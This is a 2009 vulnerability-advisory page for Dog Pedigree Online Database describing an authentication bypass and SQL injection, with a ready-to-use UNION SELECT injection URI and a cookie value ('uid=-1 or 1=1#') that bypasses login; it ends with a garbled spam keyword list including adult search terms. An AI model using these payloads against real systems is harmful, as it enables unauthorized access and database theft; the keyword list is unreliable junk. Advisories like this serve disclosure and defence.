exploits , vulnerabilities , articles , Dog Pedigree Online Database Authentication Bypass and Multiple SQL Injection Vulnerabilities

Title	Dog Pedigree Online Database Authentication Bypass and Multiple SQL Injection Vulnerabilities
Published	2009-05-19-12:00AM
Updated	2009-05-20-03:30PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	YEnH4ckEr
Vulnerable	Dog Pedigree Online Database Dog Pedigree Online Database Beta 1.2 Dog Pedigree Online Database Dog Pedigree Online Database beta 1.0.1
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following exploit code, example data and URIs are available:http://www.example.com/[HOME_PATH]/managePerson.php?personId=-1+UNION+ALL+SELECT+1,version(),user(),database(),version(),user(),database(),version(),user(),database(),11,12%23Add cookie --> Name ~> dogarchive_user_info --> Value ~> email=&uid=-1%20or%201=1#&seclev= /data/vulnerabilities/exploits/35032-1.txt /data/vulnerabilities/exploits/35032-2.pl /data/vulnerabilities/exploits/35032-3.pl
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 14:58:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pocket pc www.xl;xx. lolasdri . POP 3 expl Pritee zin www.517aq. Www.sexopa shell acce crack data www.xl;xx. cpanel 4.1 telnet lin mambo+Remo www.youtob doosan.5d6 Actors pho www.addict pantura.or mambo+Remo ms rpc exp xNxx+ www.gp930. www.xboshi shop576204 SEXSCHOOL jboss seam ms01-032 hinhanhsex news for c 200 /compo Imagenes POP 3 expl Nude tamil lanDesk so hinhanhsex news for c moehayko[n sexci Hotxxx mambo Remo trumpetame bag maxcpm.inf www.988.jx oneadmin.h news for c Big tittis rst pinkworld. www.zjxslm